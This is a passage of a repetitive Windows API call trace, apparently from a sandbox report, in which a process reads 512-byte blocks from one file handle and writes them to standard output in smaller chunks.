lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.549] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.549] GetFileType (hFile=0x4c) returned 0x1 [0107.549] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.549] WriteFile (in: hFile=0x4c, lpBuffer=0x1af024*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1af024*, lpNumberOfBytesWritten=0x1ae028*=0x20, lpOverlapped=0x0) returned 1 [0107.549] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.549] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.549] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.549] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.549] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.549] GetFileType (hFile=0x4c) returned 0x1 [0107.549] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.549] GetFileType (hFile=0x4c) returned 0x1 [0107.549] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.549] WriteFile (in: hFile=0x4c, lpBuffer=0x1aee44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.550] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.550] GetFileType (hFile=0x4c) returned 0x1 [0107.550] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.550] WriteFile (in: hFile=0x4c, lpBuffer=0x1aee94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aee94*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.550] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.550] GetFileType (hFile=0x4c) returned 0x1 [0107.550] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.550] WriteFile (in: hFile=0x4c, lpBuffer=0x1aeee4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aeee4*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.550] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.550] GetFileType (hFile=0x4c) returned 0x1 [0107.550] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.550] WriteFile (in: hFile=0x4c, lpBuffer=0x1aef34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aef34*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.550] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.550] GetFileType (hFile=0x4c) returned 0x1 [0107.550] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.550] WriteFile (in: hFile=0x4c, lpBuffer=0x1aef84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aef84*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.550] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.550] GetFileType (hFile=0x4c) returned 0x1 [0107.550] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.550] WriteFile (in: hFile=0x4c, lpBuffer=0x1aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aefd4*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.550] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.550] GetFileType (hFile=0x4c) returned 0x1 [0107.550] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.550] WriteFile (in: hFile=0x4c, lpBuffer=0x1af024*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1af024*, lpNumberOfBytesWritten=0x1ae028*=0x20, lpOverlapped=0x0) returned 1 [0107.550] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.550] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.550] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.550] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.550] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.551] GetFileType (hFile=0x4c) returned 0x1 [0107.551] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.551] GetFileType (hFile=0x4c) returned 0x1 [0107.551] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.551] WriteFile (in: hFile=0x4c, lpBuffer=0x1aee44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.551] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.551] GetFileType (hFile=0x4c) returned 0x1 [0107.551] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.551] WriteFile (in: hFile=0x4c, lpBuffer=0x1aee94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aee94*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.551] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.551] GetFileType (hFile=0x4c) returned 0x1 [0107.551] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.551] WriteFile (in: hFile=0x4c, lpBuffer=0x1aeee4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aeee4*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.551] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.551] GetFileType (hFile=0x4c) returned 0x1 [0107.551] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.551] WriteFile (in: hFile=0x4c, lpBuffer=0x1aef34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aef34*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.551] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.551] GetFileType (hFile=0x4c) returned 0x1 [0107.551] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.551] WriteFile (in: hFile=0x4c, lpBuffer=0x1aef84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aef84*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.551] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.551] GetFileType (hFile=0x4c) returned 0x1 [0107.551] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.551] WriteFile (in: hFile=0x4c, lpBuffer=0x1aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aefd4*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.551] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.551] GetFileType (hFile=0x4c) returned 0x1 [0107.551] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.551] WriteFile (in: hFile=0x4c, lpBuffer=0x1af024*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1af024*, lpNumberOfBytesWritten=0x1ae028*=0x20, lpOverlapped=0x0) returned 1 [0107.551] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.551] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.551] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.551] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.552] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.552] GetFileType (hFile=0x4c) returned 0x1 [0107.552] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.552] GetFileType (hFile=0x4c) returned 0x1 [0107.552] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.552] WriteFile (in: hFile=0x4c, lpBuffer=0x1aee44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.552] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.552] GetFileType (hFile=0x4c) returned 0x1 [0107.552] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.552] WriteFile (in: hFile=0x4c, lpBuffer=0x1aee94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aee94*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.552] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.552] GetFileType (hFile=0x4c) returned 0x1 [0107.552] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.552] WriteFile (in: hFile=0x4c, lpBuffer=0x1aeee4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aeee4*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.552] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.552] GetFileType (hFile=0x4c) returned 0x1 [0107.552] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.552] WriteFile (in: hFile=0x4c, lpBuffer=0x1aef34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aef34*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.552] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.552] GetFileType (hFile=0x4c) returned 0x1 [0107.552] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.552] WriteFile (in: hFile=0x4c, lpBuffer=0x1aef84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aef84*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.552] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.552] GetFileType (hFile=0x4c) returned 0x1 [0107.552] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.552] WriteFile (in: hFile=0x4c, lpBuffer=0x1aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aefd4*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.552] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.552] GetFileType (hFile=0x4c) returned 0x1 [0107.552] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.552] WriteFile (in: hFile=0x4c, lpBuffer=0x1af024*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1af024*, lpNumberOfBytesWritten=0x1ae028*=0x20, lpOverlapped=0x0) returned 1 [0107.552] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.552] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.552] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.552] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.553] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.553] GetFileType (hFile=0x4c) returned 0x1 [0107.553] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.553] GetFileType (hFile=0x4c) returned 0x1 [0107.553] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.553] WriteFile (in: hFile=0x4c, lpBuffer=0x1aee44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.553] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.553] GetFileType (hFile=0x4c) returned 0x1 [0107.553] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.553] WriteFile (in: hFile=0x4c, lpBuffer=0x1aee94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aee94*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.553] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.553] GetFileType (hFile=0x4c) returned 0x1 [0107.553] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.553] WriteFile (in: hFile=0x4c, lpBuffer=0x1aeee4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aeee4*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.553] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.553] GetFileType (hFile=0x4c) returned 0x1 [0107.553] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.553] WriteFile (in: hFile=0x4c, lpBuffer=0x1aef34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aef34*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.553] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.553] GetFileType (hFile=0x4c) returned 0x1 [0107.553] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.553] WriteFile (in: hFile=0x4c, lpBuffer=0x1aef84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aef84*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.553] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.553] GetFileType (hFile=0x4c) returned 0x1 [0107.553] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.553] WriteFile (in: hFile=0x4c, lpBuffer=0x1aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aefd4*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.553] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.553] GetFileType (hFile=0x4c) returned 0x1 [0107.553] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.553] WriteFile (in: hFile=0x4c, lpBuffer=0x1af024*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1af024*, lpNumberOfBytesWritten=0x1ae028*=0x20, lpOverlapped=0x0) returned 1 [0107.553] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.553] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.554] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.554] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.554] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.554] GetFileType (hFile=0x4c) returned 0x1 [0107.554] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.554] GetFileType (hFile=0x4c) returned 0x1 [0107.554] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.554] WriteFile (in: hFile=0x4c, lpBuffer=0x1aee44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.554] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.554] GetFileType (hFile=0x4c) returned 0x1 [0107.554] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.554] WriteFile (in: hFile=0x4c, lpBuffer=0x1aee94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aee94*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.554] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.554] GetFileType (hFile=0x4c) returned 0x1 [0107.554] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.554] WriteFile (in: hFile=0x4c, lpBuffer=0x1aeee4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aeee4*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.554] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.554] GetFileType (hFile=0x4c) returned 0x1 [0107.554] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.554] WriteFile (in: hFile=0x4c, lpBuffer=0x1aef34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aef34*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.554] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.554] GetFileType (hFile=0x4c) returned 0x1 [0107.554] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.554] WriteFile (in: hFile=0x4c, lpBuffer=0x1aef84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aef84*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.554] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.554] GetFileType (hFile=0x4c) returned 0x1 [0107.554] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.554] WriteFile (in: hFile=0x4c, lpBuffer=0x1aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aefd4*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.554] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.554] GetFileType (hFile=0x4c) returned 0x1 [0107.554] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.554] WriteFile (in: hFile=0x4c, lpBuffer=0x1af024*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1af024*, lpNumberOfBytesWritten=0x1ae028*=0x20, lpOverlapped=0x0) returned 1 [0107.554] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.554] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.555] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.555] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.555] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.555] GetFileType (hFile=0x4c) returned 0x1 [0107.555] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.555] GetFileType (hFile=0x4c) returned 0x1 [0107.555] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.555] WriteFile (in: hFile=0x4c, lpBuffer=0x1aee44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.555] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.555] GetFileType (hFile=0x4c) returned 0x1 [0107.555] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.555] WriteFile (in: hFile=0x4c, lpBuffer=0x1aee94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aee94*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.555] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.555] GetFileType (hFile=0x4c) returned 0x1 [0107.555] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.555] WriteFile (in: hFile=0x4c, lpBuffer=0x1aeee4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aeee4*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.555] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.555] GetFileType (hFile=0x4c) returned 0x1 [0107.555] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.555] WriteFile (in: hFile=0x4c, lpBuffer=0x1aef34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aef34*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.555] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.555] GetFileType (hFile=0x4c) returned 0x1 [0107.555] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.555] WriteFile (in: hFile=0x4c, lpBuffer=0x1aef84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aef84*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.555] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.605] GetFileType (hFile=0x4c) returned 0x1 [0107.605] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.605] WriteFile (in: hFile=0x4c, lpBuffer=0x1aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aefd4*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.605] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.605] GetFileType (hFile=0x4c) returned 0x1 [0107.605] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.605] WriteFile (in: hFile=0x4c, lpBuffer=0x1af024*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1af024*, lpNumberOfBytesWritten=0x1ae028*=0x20, lpOverlapped=0x0) returned 1 [0107.606] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.606] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.606] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.606] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.606] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.606] GetFileType (hFile=0x4c) returned 0x1 [0107.606] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.606] GetFileType (hFile=0x4c) returned 0x1 [0107.606] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.606] WriteFile (in: hFile=0x4c, lpBuffer=0x1aee44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.606] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.606] GetFileType (hFile=0x4c) returned 0x1 [0107.606] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.606] WriteFile (in: hFile=0x4c, lpBuffer=0x1aee94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aee94*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.606] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.606] GetFileType (hFile=0x4c) returned 0x1 [0107.606] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.606] WriteFile (in: hFile=0x4c, lpBuffer=0x1aeee4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aeee4*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.606] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.606] GetFileType (hFile=0x4c) returned 0x1 [0107.606] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.606] WriteFile (in: hFile=0x4c, lpBuffer=0x1aef34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aef34*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.606] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.606] GetFileType (hFile=0x4c) returned 0x1 [0107.606] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.606] WriteFile (in: hFile=0x4c, lpBuffer=0x1aef84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aef84*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.607] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.607] GetFileType (hFile=0x4c) returned 0x1 [0107.607] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.607] WriteFile (in: hFile=0x4c, lpBuffer=0x1aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aefd4*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.607] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.607] GetFileType (hFile=0x4c) returned 0x1 [0107.607] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.607] WriteFile (in: hFile=0x4c, lpBuffer=0x1af024*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1af024*, lpNumberOfBytesWritten=0x1ae028*=0x20, lpOverlapped=0x0) returned 1 [0107.607] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.607] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.607] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.607] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.607] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.607] GetFileType (hFile=0x4c) returned 0x1 [0107.607] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 